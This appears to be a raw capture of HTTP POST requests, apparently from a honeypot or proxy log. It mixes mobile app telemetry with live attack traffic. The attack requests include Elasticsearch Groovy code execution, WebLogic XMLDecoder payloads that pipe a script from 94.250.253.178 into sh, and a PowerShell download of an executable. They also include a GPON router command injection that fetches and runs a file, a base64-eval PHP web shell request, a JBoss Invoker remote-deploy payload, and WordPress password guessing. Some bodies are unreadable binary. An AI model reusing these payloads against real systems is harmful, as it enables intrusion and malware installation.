Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://boys-here.com/nntesto/http.php HTTP/1.0
Accept: */*
Referer: http://boys-here.com/nntesto/http.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: boys-here.com
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST /wls-wsat/CoordinatorPortType11 HTTP/1.0
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Type: text/xml
Content-Length: 825
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.la
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åü‰
ÎÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î™95Y›∆√«∆fl
POST http://md5online.net/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Host: md5online.net
Referer: http://md5online.net/
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Proxy-Connection: Keep-Alive
Content-Length: 66
pass=53cb64666ccbe8fa36261fe8507ad4ba&option=hash2text&send=Submit
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=CPOJ867TH
POST /rulai.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://x.x.x.x/rulai.php
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Content-Length: 377
Host: x.x.x.x
rulai=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7
POST http://hydra.alibaba.com/utdid_uc_browser/get_aid/?auth[token]=c8bc6fdf9837b2cbc7a9ed011ca1327b&type=utdid&id=V3JxZrJFQuwDAMtgV%2FWSY7o6&aid= HTTP/1.1
Content-Length: 0
Host: hydra.alibaba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 18
Cache-Control: no-cache
log=admin&pwd=5555
POST http://check.proxyradar.com/azenv.php?auth=152363140601&a=PSCMN&i=1082781672&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=admin111
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84
{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache
S6dex47PZ2KT2iiFgR8sMuB3GYObbM7sRUc5dSr4/j4yZKFsc6FzNj4MJElJTfwkH5/lwLwDLiBGZYaHN5CDdG7aPlTkhjwfdtUv0OmpEnf9MGCS81XDA388GHcdLqqUG4LauXDwh/zdH3ZVSc9WbB8HmwZwFSFaUQKMXc7ls4djknDWFKtpnwqKmCV78M9LhsqzoFaHELydALUBZFhWX92KaVMFJunn7HQY4aVZj5U8Or79hZqV59oGilQ57qaPloB6oWhNVgbUeOvm1TTXfIlWIC8jUjfF4JqWeErKzoQuVFnz1ryrFgndQ8xLZ8HoROP0KfQ2T0XSqH4JDogrYCKexNva+8XR3sdN3+944zay5YcruL7wxCPdAoieog==
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 640
Cache-Control: no-cache
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=jamesatchue&pwd=a1234567
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=00000
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://gj.applog.uc.cn/collect?zip=gzip&pf=android&pn=com.uc.browser.en&ve=10.9.0&vc=104&sdk_ve=3.0.10&sdk_vc=212&sf=PVBusinessUnion&app=0652abada25c&uuid=15bf5ee0f45-af8795dc3d31775f&vno=1495542390272&chk=7d2ac04d HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: gj.applog.uc.cn
Transfer-Encoding: chunked
Content-Type: application/octet-stream
POST http://check.proxyradar.com/azenv.php?auth=149379374641&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
785621
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
fff339d76446e5ea95f93fea927fda96
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--ExVSnfpn1k6NCBplkqQXdo4doSbba_FR3hUaSXXB--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
QqAIx9vOZXKfykIE3undb6dj0ANjgX8+umAQphqv7ZgHHU7TVXo/CAlIGEOKVzhUQcMRogvkfTKt4iATVPkZmu6tecrzsrCEOvUYy/oZouI5IVQqdg70H4hlIEeuOEPmVtHPAQtirX3zExHH3qFouU/98F5U1XY2zNUw27qGjV/xB2m9dnSETXkvy6e8iVlQVic7uqyA3NDiF+KMGvsU4q7/rjKMfNqlitz4qlyWuvPR/+jR8HE+bzRZTdhdwgmTW4f5q2206Iy+U+u7vv9WqWXGwi7wrD2CMgRWZJexHwcrLwCfilBYyG5Y/Z9oactCd+QqGXgG6HaX8rQgEj/O5KU0wnP4h7Q9utMf+vKr85q+joaNdq5tYlaDu4586S+iGBc=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÀ6ªÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1078
Content-Type: multipart/form-data; boundary=mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
67734
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
117df4e508caa37924c63af4d2336b5d
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--mZdF9Bvh1WwKfPojI7fgH5UC6Z6ZnaNLRt74QaE1--
POST http://check.proxyradar.com/azenv.php?auth=149666179119&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477786015288
X-Umeng-Sdk: Android/5.6.7 musical.ly%2F4.15.0+GT-N8013%2F6.0.1+4C6E14E635355D555E3144A6F51E9977
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
2b7
1.05559e28267e58eb4c1000012@0bd721cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0b58ñ‹fiÄ ∞ ·xúïíΩkAáá3wâá`Dv…!WX¨≈≠Û˝’ù!ƒhPØdvg6.ÓfiÜ[r´`´b'àç¯ó‰Ô∞ ÷ˆÇ{Ò-r®3’¿˚ŒÔyfi^fÙ ‰úkO“sÂñb‘L`á≈ò≈(8z˜È≈E”™åü?…ã‹Vvw7.˜Í<µE±ÿʱà%ÏnV’N·∑ ªœºÅµa‘a6î!ÎF13Üj3‰Ülæn1,Ã-l»∞aπ$ê!ÿ§»0i®2V¿´9Ô±ÂDx§¨„ôñíf9≈iÍœhâV6Ó*Ñ)\fiflö ˛ˆ§J}]Wì˛ƒO˚®Meq.«nRÂ∂Eåb‹ >\/µRóÓ){÷XÆmYÔçw¬√£◊flfièNfl∞≥uÔ&E∑·iËÁaÀèakÙ@Å®;ó7vñ@/¸~pı«‹YkøZ ]f·5D¥L1&É‘±l¿í4h$È@iÈ2≠qBΩ?øôµ-–©˝$∑\e…L£D¢D%s·€óÛívÓJ«ˇ¶+¸xRÆ¥ÈÚ¬/'ô]˚Kœ„∆–™uLpü1ΔîËflˇ\yÁt—"∫f?é·¢ÉèËhQ4Ä«&£ˇ1 ‡lÍh·‘Äü´›‚t@000021cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0000 f8bded51422f4e7c6a822334c318cacc
0
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
h=die('Hello, Peppa!');
POST http://check.proxyradar.com/azenv.php?auth=152385091647&a=PSCMN&i=1082785689&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache
RfBek9jIMrjmTdOqXt2VZ4vjL9fQ54lmlFPB1cZ1U/4p8SS4WyiZE5M6xfNfLT9xat/DidJnGaqLb35Axiwye4PwqngJYEHYHdZZdkyhqxE4IFoG3MnLmNALmkssH0f2iq6GNNJZoXndx+pd8MBWaL26iSslPkKmGq+R71w2N4cUZ5bHE6pTmilUgTx+Vb//JjDL8bjPN1LtkwRlyrEcvX/2xFnmIEZ/T8vD1G2+eGWk8SZfJI7/jDJsd049YSxUXAZZZZQuwL4P/kYx+xuSksRady+fWWhyl+c/cPntOG3NDLIi9KsdKtuBmMTtyQysoAUb/TsBO7YeS3DeicL77zH7bNXBsbwa3lgle2ug3CGmnBXR
POST http://check.proxyradar.com/azenv.php?auth=149376270899&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÀ6ªÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î_4Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=152314491205&a=PSCMN&i=1082785710&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%NñÁÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î~+Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149416744271&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
F6YIlNrAZ/2LOCGSVcSr9G+LgdXbo7NEf+l43Q1MDh0zKnIJhJOmTQvOOuNtZsUrJ7IZqPiY0VwRa/FBNosSaaJGLensl0AMCSLJaV4XHr5qwalBSam+PehTNWWTHqVW18nBvKT7jhM+uluzI/vIviEA93TJJg0lxLNYS0uJAxyQl4Yowj11VpebnHiA7s2xTZqiCkHNOclbZ6QMlgRhsZU4wPNGpU32L2xXFBD1tId2Qex5TPyGqEgWQIaaot14tr6MkUbdrwi7uI+htyGAtXlJSJtrGlxxhuhpa1q/m8yMcislwMYSzF+p+v5SXNV94UnglqH0CbekT/JvRQ5mdr6Ofvka6kcvrxGeq/gF3sKh9EskPrCrgA56oLkDgRx0KteP1at+tt91wL1QzTGjt8+/kF9Y9QYbqyTx1uMldmArlGM+xQ==
POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[ signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxpsr java.net.URLñ%76¸‰rIhashCodeIportL authorityq~Lfileq~Lhostq~Lprotocolq~Lrefq~xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~ thttppxur[Ljava.lang.String;≠“VÁÈ{Gxpt java.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
